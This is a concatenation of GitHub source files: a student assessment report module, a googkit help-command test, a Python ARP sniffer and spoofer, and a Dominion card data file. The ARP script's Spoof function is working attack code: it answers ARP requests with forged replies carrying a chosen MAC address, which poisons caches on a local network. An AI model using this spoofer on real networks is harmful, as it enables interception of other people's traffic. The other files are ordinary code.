= custom_metadata_map.get(subject_name)\n        # format and rearrange cutpoints\n        result = get_cut_points(custom, result)\n\n        result['claims'] = get_claims(number_of_claims=5, result=result, include_names=True, include_scores=True, include_min_max_scores=True, include_indexer=True)\n        result['accommodations'] = get_accommodations(result=result)\n\n        new_results.append(result)\n\n    # rearranging the json so we could use it more easily with mustache\n    for idx, value in enumerate(new_results):\n        new_results[idx] = __calculateClaimScoreRelativeDifference(value)\n    return {\"all_results\": new_results}\n\n\ndef __arrange_results_iab(results, subjects_map, custom_metadata_map):\n    '''\n    This method arranges the data retrieved from the db to make it easier to consume by the client\n    '''\n    iab_results = {}\n    if len(results) == 0:\n        return iab_results\n    first_result = results[0]\n    iab_results['student_full_name'] = format_full_name(first_result['first_name'], first_result['middle_name'], first_result['last_name'])\n    iab_results['first_name'] = first_result.get('first_name')\n    iab_results['middle_name'] = first_result.get('middle_name')\n    iab_results['last_name'] = first_result.get('last_name')\n    iab_results['asmt_grade'] = first_result.get('asmt_grade')\n    iab_results['asmt_type'] = capwords(first_result.get('asmt_type'), ' ')\n    iab_results['asmt_period_year'] = first_result.get('asmt_period_year')\n    iab_results['student_id'] = first_result.get('student_id')\n\n    # Go through each of the different subjects ELA, Math etc.\n    subject_data = {}\n    for alias in subjects_map.values():\n        subject_data[alias] = []\n    # Check each DB result against the subject\n    for result in results:\n        subject_list = {}\n        subject = result['asmt_subject']\n        subject_list['claims'] = 
get_claims(number_of_claims=1, result=result, include_names=True, include_scores=False, include_min_max_scores=False, include_indexer=False, include_complete_admin_cond=True)\n subject_list['grade'] = result.get('asmt_grade')\n subject_list['date_taken'] = result.get('date_taken')\n subject_data[subjects_map.get(subject)].append(subject_list)\n # Create map from subject to all value for it's type\n for k, v in subject_data.items():\n iab_results[k] = v\n return {\"all_results\": iab_results}\n\n\n@report_config(name=REPORT_NAME,\n params={\n Constants.STATECODE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z]{2}$\"},\n Constants.STUDENTGUID: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASSESSMENTGUID: {\n \"type\": \"string\",\n \"required\": False,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASMTYEAR: {\n \"type\": \"integer\",\n \"required\": True,\n \"pattern\": \"^[1-9][0-9]{3}$\"},\n Constants.DATETAKEN: {\n \"type\": \"integer\",\n \"required\": False,\n \"pattern\": \"^[1-9]{8}$\"},\n Constants.ASMTTYPE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^(\" + AssessmentType.INTERIM_ASSESSMENT_BLOCKS + \"|\" + AssessmentType.SUMMATIVE + \"|\" + AssessmentType.INTERIM_COMPREHENSIVE + \")$\"}\n })\n@validate_user_tenant\n@user_info\n@get_current_request_context\n@audit_event()\ndef get_student_report(params):\n '''\n Individual Student Report\n '''\n student_id = params[Constants.STUDENTGUID]\n state_code = params[Constants.STATECODE]\n academic_year = params.get(Constants.ASMTYEAR)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_type = asmt_type if asmt_type and asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS else None\n\n with EdCoreDBConnection(state_code=state_code) as connection:\n # choose query IAB or other assessment\n query_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __prepare_query_iab, None: __prepare_query}\n # choose arrange results for the client IAB or other assessment\n arrange_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __arrange_results_iab, None: __arrange_results}\n query = query_function[asmt_type](connection, params)\n result = connection.get_result(query)\n if not result:\n logger.error(\"Individual student report: there are no results for student id : %s\", student_id)\n raise NotFoundException(\"There are no results for student id {0}\".format(student_id))\n records = [record for record in result if record['asmt_period_year'] == academic_year]\n first_student = records[0] if len(records) > 0 else result[0]\n state_code = first_student[Constants.STATE_CODE]\n district_id = first_student[Constants.DISTRICT_ID]\n school_id = first_student[Constants.SCHOOL_ID]\n asmt_grade = first_student['asmt_grade']\n student_name = format_full_name(first_student['first_name'], first_student['middle_name'], first_student['last_name'])\n context = get_breadcrumbs_context(state_code=state_code, district_id=district_id, school_id=school_id, asmt_grade=asmt_grade, student_name=student_name)\n student_report_asmt_administration = get_asmt_administration_years_isr(state_code, student_ids=student_id)\n\n # color metadata\n custom_metadata_map = get_custom_metadata(result[0].get(Constants.STATE_CODE), None)\n # subjects map\n subjects_map = get_subjects_map()\n result = arrange_function[asmt_type](result, subjects_map, custom_metadata_map)\n\n result['context'] = context\n result[Constants.METADATA] = {Constants.BRANDING: 
custom_metadata_map.get(Constants.BRANDING)}\n result[Constants.SUBJECTS] = {v: k for k, v in subjects_map.items()}\n result['asmt_administration'] = student_report_asmt_administration\n return result\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/student_report.py","file_name":"student_report.py","file_ext":"py","file_size_in_byte":24626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
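The __calculateClaimScoreRelativeDifference helper above normalizes each claim's gap from the overall assessment score by the largest absolute gap, so every claim lands in the range -100..100. A standalone sketch of the same arithmetic, using illustrative numbers rather than real report data:

def claim_relative_differences(asmt_score, claim_scores):
    # Largest absolute gap between any claim score and the overall score.
    max_abs_diff = max((abs(asmt_score - s) for s in claim_scores), default=0)
    if max_abs_diff == 0:
        return [0 for _ in claim_scores]
    # Signed percentage of the largest gap, matching int((score - asmt_score) / max * 100).
    return [int((s - asmt_score) / max_abs_diff * 100) for s in claim_scores]

# Overall score 2400 with claims at 2300, 2400 and 2450 -> [-100, 0, 50]
print(claim_relative_differences(2400, [2300, 2400, 2450]))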
+{"seq_id":"39221250381","text":"import unittest\n\nfrom test.stub_stdout import StubStdout\n\nfrom googkit.commands.command import Command\nfrom googkit.compat.unittest import mock\nfrom googkit.lib.argument import ArgumentParser\nfrom googkit.lib.command_tree import CommandTree\nfrom googkit.lib.help import Help\n\n\nclass TestHelp(unittest.TestCase):\n class OptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set(['--foo', '--bar'])\n\n class NoOptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set()\n\n def setUp(self):\n CommandTree.DEFAULT_TREE = {\n '0_leaf': TestHelp.NoOptionCommand,\n '0_node': {\n '1_leaf': TestHelp.OptionCommand,\n '1_node': {\n '2_leaf': mock.MagicMock()\n }\n }\n }\n self.tree = CommandTree()\n\n def help_with_args(self, args):\n arg = ArgumentParser.parse(['googkit.py'] + args)\n return Help(self.tree, arg)\n\n def test_is_valid_commands(self):\n help = self.help_with_args(['0_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf', 'bluerose'])\n self.assertFalse(help._is_valid_commands())\n\n def test_print_usage(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n def test_print_available_commands(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_commands(None)\n self.assertFalse(mock_stdout.write.called)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Available commands') >= 0)\n\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Did you mean one of these') >= 0)\n\n def test_similarity(self):\n func = Help.similarity('desp')\n self.assertTrue(func('deps') >= func('build'))\n self.assertTrue(func('') == 0)\n\n def test_candidates(self):\n available_commands = ['build', 'compile', 'deps', 'init', 'lint', 'setup']\n result = Help.candidates(available_commands, 'desp')\n self.assertEqual(result[0], 'deps')\n result = Help.candidates(available_commands, 'int')\n self.assertTrue('init' in result)\n self.assertTrue('lint' in result)\n\n def test_print_available_options(self):\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Non-existent command should not print availabe options')\n\n help = 
self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Command that has no supported options should not print available options')\n\n help = self.help_with_args(['0_node', '1_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_options()\n self.assertTrue(\n mock_stdout.getvalue().find('Available options') >= 0,\n 'Command that has supported options should print available options')\n\n def test_print_help(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertFalse(mock_stdout.getvalue().find('Invalid command') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertTrue(mock_stdout.getvalue().find('Invalid command') >= 0)\n","repo_name":"googkit/googkit","sub_path":"test/lib/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"}
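The tests above repeatedly patch sys.stdout with the project's StubStdout to inspect what Help prints. The same capture pattern works with a plain io.StringIO, which is presumably all StubStdout wraps; a minimal sketch:

import io
from unittest import mock

def print_commands():
    print('Available commands:')

with mock.patch('sys.stdout', new_callable=io.StringIO) as fake_out:
    print_commands()

# The captured text can now be asserted on, exactly as in the tests above.
assert fake_out.getvalue().find('Available commands') >= 0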
+{"seq_id":"32687369500","text":"#!/usr/bin/python3\r\nimport socket\r\nimport struct\r\nimport uuid\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef getsocketinformation():\r\n #create socket and receive all type of packets\r\n a_scoket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\r\n\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n a_scoket.bind((os.listdir('/sys/class/net/')[1], 0))\r\n\r\n return a_scoket\r\n\r\ndef getmac():\r\n List = []\r\n Mymac = uuid.getnode()\r\n count = 0\r\n while(count < 6):\r\n List = [Mymac % 0x100] + List\r\n Mymac //= 0x100\r\n count += 1\r\n return List\r\n\r\ndef getpacketinformation():\r\n arpin = {\r\n 'my_mac' : struct.pack('!6B',*getmac()),\r\n 'my_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_type' : struct.pack('!H', 0x0806)\r\n }\r\n packet = {\r\n\r\n #header\r\n 'target_mac_addr' : struct.pack('!6B',0xFF,0xFF,0xFF,0xFF,0xFF,0xFF),\r\n 'source_mac_addr' : struct.pack('!6B',*getmac()),\r\n 'frame_type' : struct.pack('!H',0x0806),\r\n\r\n #arp body\r\n 'arp_body_hw_type' : struct.pack('!H', 0x0001),\r\n 'arp_body_protocal_type' : struct.pack('!H', 0x0800),\r\n 'arp_body_hw_length' : struct.pack('!B', 0x06),\r\n 'arp_body_protocal_length' : struct.pack('!B', 0x04),\r\n 'arp_body_opcode' : struct.pack('!H', 0x0001),\r\n 'arp_body_source_mac' : struct.pack('!6B',*getmac()),\r\n 'arp_body_source_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_body_target_mac' : struct.pack('!6B',0,0,0,0,0,0),\r\n 'arp_body_target_ip' : ''\r\n }\r\n return packet\r\n\r\ndef receive(my_socket):\r\n my_packet = getpacketinformation()\r\n\r\n frame = my_socket.recvfrom(2048)\r\n header = frame[0][0:14]\r\n arp_body = frame[0][14:42]\r\n\r\n header_temp = struct.unpack(\"!6s6s2s\", header)\r\n arp_body_temp = struct.unpack(\"!2s2s1s1s2s6s4s6s4s\", arp_body)\r\n\r\n my_packet['target_mac_addr'] = binascii.hexlify(header_temp[0],':')\r\n my_packet['source_mac_addr'] = binascii.hexlify(header_temp[1],':')\r\n my_packet['frame_type'] = header_temp[2]\r\n\r\n my_packet['arp_body_opcode'] = arp_body_temp[4]\r\n my_packet['arp_body_source_mac'] = binascii.hexlify(arp_body_temp[5],':')\r\n my_packet['arp_body_source_ip'] = socket.inet_ntoa(arp_body_temp[6])\r\n my_packet['arp_body_target_mac'] = binascii.hexlify(arp_body_temp[7],':')\r\n my_packet['arp_body_target_ip'] = socket.inet_ntoa(arp_body_temp[8])\r\n\r\n return my_packet\r\n\r\ndef listening():\r\n print(\"### ARP sniffer mode ###\")\r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? 
Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef Listening(ip):\r\n print(\"### ARP sniffer mode ###\")\r\n \r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n #print(_Packet['arp_body_target_ip'])\r\n #receive target or source is \"ip\" only\r\n if _Packet['arp_body_target_ip'] != ip and _Packet['arp_body_source_ip'] != ip:\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef question(ip):\r\n Arp_packet = getpacketinformation()\r\n Arp_socket = getsocketinformation()\r\n\r\n Arp_packet['arp_body_target_ip'] = socket.inet_aton(ip)\r\n\r\n Arp_packet_list = [ i for i in Arp_packet.values() ]\r\n \r\n\r\n\r\n Arp_packet['arp_body_source_ip'] = socket.inet_ntoa(Arp_packet['arp_body_source_ip'])\r\n Arp_packet['arp_body_target_ip'] = socket.inet_ntoa(Arp_packet['arp_body_target_ip'])\r\n\r\n\r\n\r\n Arp_socket.send(b''.join(Arp_packet_list))\r\n \r\n print(\"Get ARP packet - Who has \" + Arp_packet['arp_body_target_ip'] + \" ? Tell \" + Arp_packet['arp_body_source_ip'])\r\n\r\n while True:\r\n Arp_responce = receive(Arp_socket)\r\n\r\n if Arp_responce['frame_type'] != b'\\x08\\x06':\r\n continue\r\n \r\n\r\n if Arp_responce['arp_body_source_ip'] == ip:\r\n print(\"MAC address of \" + Arp_responce['arp_body_source_ip'] + \" is \" + bytes.decode(Arp_responce['arp_body_source_mac']))\r\n break\r\n\r\ndef Spoof(fack_mac , target_ip):\r\n a_scoket = getsocketinformation()\r\n\r\n fack_mac = str.encode(fack_mac)\r\n fack_mac = binascii.unhexlify(fack_mac.replace(b':', b''))\r\n while True:\r\n Arp_request = receive(a_scoket)\r\n\r\n if Arp_request['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if Arp_request['arp_body_opcode'] != b'\\x00\\x01' or Arp_request['arp_body_target_ip'] != target_ip:\r\n continue\r\n print(\"arp request\")\r\n \r\n print(\"Arp request target ip is \" + Arp_request['arp_body_target_ip'])\r\n\r\n print(\"fack arp responce :\")\r\n\r\n fack_arp_responce = getpacketinformation()\r\n \r\n Arp_request['arp_body_source_mac'] = bytes.decode(Arp_request['arp_body_source_mac'])\r\n Arp_request['arp_body_source_mac'] = Arp_request['arp_body_source_mac'].replace(':','')\r\n\r\n fack_arp_responce['target_mac_addr'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n fack_arp_responce['source_mac_addr'] = fack_mac\r\n fack_arp_responce['arp_body_opcode'] = struct.pack('!H', 0x0002)\r\n fack_arp_responce['arp_body_source_mac'] = fack_mac\r\n fack_arp_responce['arp_body_target_ip'] = socket.inet_aton(Arp_request['arp_body_source_ip'])\r\n fack_arp_responce['arp_body_source_ip'] = socket.inet_aton(target_ip)\r\n fack_arp_responce['arp_body_target_mac'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n \r\n \r\n fack_arp_responce_list = [ k for k in fack_arp_responce.values() ]\r\n\r\n a_scoket.send(b''.join(fack_arp_responce_list))\r\n print(\"Send successfull.\")\r\n exit()\r\n\r\n\r\n\r\ndef main(run):\r\n if os.geteuid() != 0:\r\n print(\"ERROR: You must be root to use the tool!\")\r\n exit()\r\n\r\n print(\"[ ARP sniffer and spoof program ]\")\r\n\r\n if run[0] == '-help':\r\n print(\"Format :\")\r\n print(\"1) sudo python3 arp.py -l -a\")\r\n print(\"2) sudo python3 arp.py -l \")\r\n print(\"3) sudo python3 -q 
\")\r\n print(\"4) sudo python3 \")\r\n\r\n elif run == ['-l','-a']:\r\n listening()\r\n\r\n elif run[0] == '-l':\r\n Listening(run[1])\r\n\r\n elif run[0] == '-q':\r\n question(run[1])\r\n\r\n else:\r\n Spoof(run[0],run[1])\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n\r\n\"\"\"\r\ndef a(n):\r\n code\r\n\r\nb = 10\r\na(b)\r\n\"\"\"\r\n","repo_name":"EnNoYa/EnNoYa.github.io","sub_path":"oriarp.py","file_name":"oriarp.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31807228437","text":"cards = {\n 'adventurer' : {\n 'name':'Adventurer',\n 'set':'Base',\n 'cost':6,\n 'type':'Action',\n 'effects': {\n 'other':'Reveal cards from your deck until you reveal 2 Treasure cards. Put those treasure cards into your hand and discard the other revealed cards'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/adventurer.jpg'\n },\n 'bureaucrat' : {\n 'name':'Bureaucrat',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Gain a Silver card; put it on top of your deck. Each other player reveals a Victory card from their hand and puts it on their deck (or reveals a hand with no Victory cards).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/bureaucrat.jpg'\n },\n 'cellar' : {\n 'name':'Cellar',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'actions':1,\n 'other':'Discard any number of cards. +1 Card per card discarded.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/cellar.jpg'\n },\n 'chancellor' : {\n 'name':'Chancellor',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'coins':2,\n 'other':'You may immediately put your deck into your discard pile.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chancellor.jpg'\n },\n 'chapel' : {\n 'name':'Chapel',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'other':'Trash up to 4 cards from your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chapel.jpg'\n },\n 'council_room' : {\n 'name':'Council Room',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':4,\n 'buys':1,\n 'other':'Each other player draws a card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/councilroom.jpg'\n },\n 'feast' : {\n 'name':'Feast',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash this card. Gain a card costing up to 5.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/feast.jpg'\n },\n 'festival' : {\n 'name':'Festival',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'actions':2,\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/festival.jpg'\n },\n 'gardens' : {\n 'name':'Gardens',\n 'set':'Base',\n 'cost':4,\n 'type':'Victory',\n 'effects': {\n 'other':'Worth 1 Victory Point for every 10 cards in your desk (rounded down).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/gardens.jpg'\n },\n 'laboratory' : {\n 'name':'Laboratory',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':2,\n 'actions':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/laboratory.jpg'\n },\n 'library' : {\n 'name':'Library',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Draw until you have 7 cards in hand. 
You may set aside any Action cards drawn this way, as you draw them; discard the set aside cards after you finish drawing.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/library.jpg'\n },\n 'market' : {\n 'name':'Market',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'buys':1,\n 'coins':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/market.jpg'\n },\n 'militia' : {\n 'name':'Militia',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'coins':2,\n 'other':'Each other player discards down to 3 cards in their hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/militia.jpg'\n },\n 'mine' : {\n 'name':'Mine',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Treasure card from your hand. Gain a Treasure card costing up to 3 more; put it into your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/mine.jpg'\n },\n 'moat' : {\n 'name':'Moat',\n 'set':'Base',\n 'cost':2,\n 'type':'Action - Reaction',\n 'effects': {\n 'cards':2,\n 'other':'When another player plays an Attack card, you may reveal this from your hand. If you do so, you are unaffected by that Attack.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moat.jpg'\n },\n 'moneylender' : {\n 'name':'Moneylender',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Copper card from your hand. If you do, +3 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moneylender.jpg'\n },\n 'remodel' : {\n 'name':'Remodel',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'efftecs': {\n 'other':'Trash a card from your hand. Gain a card costing up to 2 more than the trashed card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/remodel.jpg'\n },\n 'smithy' : {\n 'name':'Smithy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'cards':3\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/smithy.jpg'\n },\n 'spy' : {\n 'name':'Spy',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'other':'Each player (including you) reveals the top card of their deck and either discards it or puts it back, your choice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/spy.jpg'\n },\n 'thief' : {\n 'name':'Thief',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Each other player reveals the top 2 cards of their deck. If they revealed any Treasure cards, they trash one of them that you choose. You may gain any or all of these trashed cards. They discard the other revealed cards.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/thief.jpg'\n },\n 'throne_room' : {\n 'name':'Throne Room',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Choose an Action card in your hand. 
Play it twice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/throneroom.jpg'\n },\n 'village' : {\n 'name':'Village',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/village.jpg'\n },\n 'witch' : {\n 'name':'Witch',\n 'set':'Base',\n 'cost':5,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':2,\n 'other':'Each other player gains a Curse card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/witch.jpg'\n },\n 'woodcutter' : {\n 'name':'Woodcutter',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/woodcutter.jpg'\n },\n 'workshop' : {\n 'name':'Workshop',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'other':'Gain a card costing up to 4 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/workshop.jpg'\n },\n 'copper' : {\n 'name':'Copper',\n 'set':'Base',\n 'cost':0,\n 'type':'Treasure',\n 'effects': {\n 'coins':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/copper.jpg'\n },\n 'silver' : {\n 'name':'Silver',\n 'set':'Base',\n 'cost':3,\n 'type':'Treasure',\n 'effects': {\n 'coins':2\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/silver.jpg'\n },\n 'gold' : {\n 'name':'Gold',\n 'set':'Base',\n 'cost':6,\n 'type':'Treasure',\n 'effects': {\n 'coins':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/gold.jpg'\n },\n 'estate' : {\n 'name':'Estate',\n 'set':'Base',\n 'cost':2,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/estate.jpg'\n },\n 'duchy' : {\n 'name':'Duchy',\n 'set':'Base',\n 'cost':5,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/duchy.jpg'\n },\n 'province' : {\n 'name':'Province',\n 'set':'Base',\n 'cost':8,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':6\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/province.jpg'\n },\n 'curse' : {\n 'name':'Curse',\n 'set':'Base',\n 'type':'Curse',\n 'effects': {\n 'victorypoints':-1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/curse.jpg'\n },\n}\n\ndecks = {\n 'first-game' : [\n 'cellar',\n 'market',\n 'militia',\n 'mine',\n 'moat',\n 'remodel',\n 'smithy',\n 'village',\n 'woodcutter',\n 'workshop',\n ],\n 'big-money' : [\n 'adventurer',\n 'bureaucrat',\n 'chancellor',\n 'chapel',\n 'feast',\n 'laboratory',\n 'market',\n 'mine',\n 'moneylender',\n 'throne_room',\n ],\n 'interaction' : [\n 'bureaucrat',\n 'chancellor',\n 'council_room',\n 'festival',\n 'library',\n 'militia',\n 'moat',\n 'spy',\n 'thief',\n 'village',\n ],\n 'size-distortion' : [\n 'cellar',\n 'chapel',\n 'feast',\n 'gardens',\n 'laboratory',\n 'thief',\n 'village',\n 'witch',\n 'woodcutter',\n 'workshop',\n ],\n 'village-square' : [\n 'bureaucrat',\n 'cellar',\n 'festival',\n 'library',\n 'market',\n 'remodel',\n 'smithy',\n 'throne_room',\n 'village',\n 'woodcutter',\n 
],\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaron-zeisler/dominion","sub_path":"dominion/dominion_data.py","file_name":"dominion_data.py","file_ext":"py","file_size_in_byte":12016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
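Because the card catalogue above is plain data, tooling can be layered on top with ordinary dict access. A short sketch that lists one predefined kingdom sorted by cost, assuming the module is importable as dominion_data:

from dominion_data import cards, decks

# Prints lines such as "Cellar (2)  Action" for the recommended first game.
for key in sorted(decks['first-game'], key=lambda k: cards[k]['cost']):
    card = cards[key]
    print('{} ({})  {}'.format(card['name'], card['cost'], card['type']))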
